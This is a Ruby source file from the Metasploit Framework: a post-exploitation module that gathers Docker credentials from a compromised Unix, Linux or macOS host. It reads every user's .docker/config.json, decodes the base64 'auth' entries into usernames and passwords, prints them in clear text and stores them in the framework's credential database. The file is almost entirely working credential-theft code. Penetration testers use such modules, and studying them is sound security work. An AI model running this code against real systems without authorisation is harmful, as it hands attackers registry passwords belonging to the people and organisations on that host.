GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/multi/gather/docker_creds.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'json'
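class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Post::Unix

  # Registers the module metadata (name, description, supported platforms
  # and session types) with the framework.
  #
  # @param info [Hash] metadata supplied by the caller and merged through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Multi Gather Docker Credentials Collection',
        'Description' => %q{
          This module will collect the contents of all users' .docker directories on the targeted
          machine. If the user has already push to docker hub, chances are that the password was
          saved in base64 (default behavior).
        },
        'License' => MSF_LICENSE,
        'Author' => ['Flibustier'],
        'Platform' => %w[bsd linux osx unix],
        'SessionTypes' => ['shell'],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )
  end

  # This module is largely based on gpg_creds.rb.

  # Builds the list of per-user .docker directories that exist on the
  # session host and hands it to download_loot.
  #
  # @return [void]
  def run
    print_status('Finding .docker directories')
    # Array#select always returns an Array, so only emptiness needs checking.
    paths = enum_user_directories
            .map { |home| "#{home}/.docker" }
            .select { |dir| directory?(dir) }

    if paths.empty?
      print_error('No users found with a .docker directory')
      return
    end

    download_loot(paths)
  end

  # Looks for config.json inside each directory and passes every file that
  # exists to extract. The file is read and parsed only; nothing in this
  # method stores a copy of it.
  #
  # @param paths [Array<String>] candidate .docker directories
  # @return [void]
  def download_loot(paths)
    print_status("Looting #{paths.count} directories")
    config_name = 'config.json'

    paths.each do |path|
      # chomp (not chomp!) so the caller's strings are left unmodified.
      target = "#{path.chomp}/#{config_name}"
      next unless file?(target)

      print_status("Downloading #{target} -> #{config_name}")
      extract(target)
    end
  end

  # Parses one Docker client config file and records every inline
  # "auth" value (base64 of "username:password") as a credential.
  #
  # A file that is not valid JSON is reported and skipped so that the
  # remaining users' files are still processed. Entries without an inline
  # 'auth' string (for example when a credential helper is configured)
  # are skipped.
  #
  # @param target [String] path of the config.json file on the session host
  # @return [void]
  def extract(target)
    begin
      parsed = JSON.parse(read_file(target).to_s)
    rescue JSON::ParserError
      print_error("Could not parse #{target} as JSON")
      return
    end

    auths = parsed['auths'] if parsed.is_a?(Hash)
    unless auths.is_a?(Hash)
      print_status('No credentials found in config file')
      return
    end

    auths.each do |registry, entry|
      vprint_status("key: #{registry}")
      next unless entry.is_a?(Hash)

      encoded = entry['auth']
      next unless encoded.is_a?(String)

      plain = Rex::Text.decode_base64(encoded)
      next unless plain.include?(':')

      # NOTE(review): this echoes the decoded username:password pair in
      # clear text; any console log or spool file will retain it.
      print_good("Found #{plain}")

      # Split on the first colon only: the password itself may contain ':'
      # and must not be truncated.
      username, password = plain.split(':', 2)
      # An unlimited split dropped a trailing empty field, so an empty
      # password was passed on as nil; keep that.
      password = nil if password.empty?

      create_credential(
        origin_type: :import,
        module_fullname: fullname,
        filename: target,
        workspace_id: myworkspace_id,
        service_name: 'docker',
        realm_value: registry,
        realm_key: Metasploit::Model::Realm::Key::WILDCARD,
        private_type: :password,
        private_data: password,
        username: username
      )

      print_good('Saved credentials')
    end
  end
end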